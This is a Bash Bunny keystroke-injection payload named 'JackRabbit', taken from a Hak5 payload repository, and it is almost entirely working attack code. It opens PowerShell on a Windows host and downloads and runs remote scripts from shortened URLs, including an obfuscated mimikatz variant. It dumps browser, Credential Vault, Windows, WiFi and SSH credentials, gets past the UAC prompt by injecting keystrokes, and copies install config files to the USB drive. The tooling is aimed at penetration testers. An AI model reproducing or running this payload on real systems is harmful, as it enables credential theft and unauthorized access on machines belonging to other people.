hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
bashbunny-payloads/payloads/library/credentials/JackRabbit/payload.txt
Sebastian Kinne 85b1bc7aca
Cleanup: Sort payloads by category
2017-04-10 13:29:17 +10:00

163 lines
5.3 KiB
Bash
Raw Blame History

#!/bin/bash
#
# Title: JackRabbit
# Author: illwill
# Version: 0.1
#
# Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a
# Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%
#
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
# https://github.com/fireeye/SessionGopher SessionGopher .ps1
# https://github.com/gentilkiwi/mimikatz md.ps1 from gentilkiwi/clymb3r/mattifestation obfuscated to mimidogz
#script
# Purple...............Jackin dat loot
# Green................Jacked dat loot
# Red Blue.............PoPo caught yo ass
LED R B 200
LOOTDIR=/root/udisk/loot/JackRabbit
mkdir -p $LOOTDIR
ATTACKMODE HID STORAGE
LED B 200
# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
# Make the loot folder of the computername
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
Q ENTER
Q DELAY 100
Q STRING md \$LOOTDIR2
Q ENTER
Q DELAY 100
# Jackin' Credential Vault (I.E./Edge)
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \|
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$LOOTDIR2\\IE-Edge.txt
Q ENTER
Q DELAY 100
# Jackin' Chrome Creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
# Open 32bit powershell and Jackin' Firefox Creds
Q GUI r
Q DELAY 100
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Q ENTER
Q DELAY 2000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
Q ENTER
Q DELAY 100
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File \$LOOTDIR2\\FireFox.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
# UAC Bypass
Q GUI r
Q STRING powershell -c "Start-Process powershell -verb runas"
Q ENTER
Q DELAY 1500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
Q ENTER
Q DELAY 100
# Jackin' Windows creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nP5aQv\'\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt
Q DELAY 300
Q ENTER
# Jackin' Wifi creds
Q STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \|
Q STRING \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \|
Q STRING \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\;PASSWORD\=\$pass \}\} \|
Q STRING Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt
Q ENTER
Q DELAY 100
# Jackin' SSH Creds
# change to "Invoke-SessionGopher -Thorough" if you want to search for PuTTY private key (.ppk), Remote Desktop (.rdp), and RSA token (.sdtid) files, to extract private key and session information.
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nrfTPI\'\)\; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt
Q ENTER
Q DELAY 100
# Jackin' dem install configs
Q STRING \$F \= @\(\)\;\$F \+\= \"C:\\sysprep.inf\"\;\$F \+\= \"C:\\sysprep\\sysprep.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattend\\Unattended.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattended.xml\"\;
Q STRING \$i \= 0\; foreach\(\$file in \$F\) \{if \(Test-Path \$file\)\{cp \$file \$LOOTDIR2\;\$i\+\+\}\}
Q ENTER
Q DELAY 100
# Output DONE to root of USB file to let bashbunny we're all good in the hood
Q DELAY 100
Q STRING Out-File -FilePath \$BUNNY\\loot\\DONE
Q ENTER
Q DELAY 100
# Eject the USB Safely
Q STRING \$Eject \= New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 1000
# GTFO
Q STRING EXIT
Q ENTER
#Sync Drive
sync
FILE="/root/udisk/loot/DONE"
while [ ! -e $FILE ]; do sleep 1; done;
sleep 1;
if [ -e $FILE ]; then rm -f $FILE; LED G 200
else LED R;
for (( ; ; ))
do
LED R;
sleep 1;
LED B;
sleep 1;
done
fi
Reference in New Issue View Git Blame Copy Permalink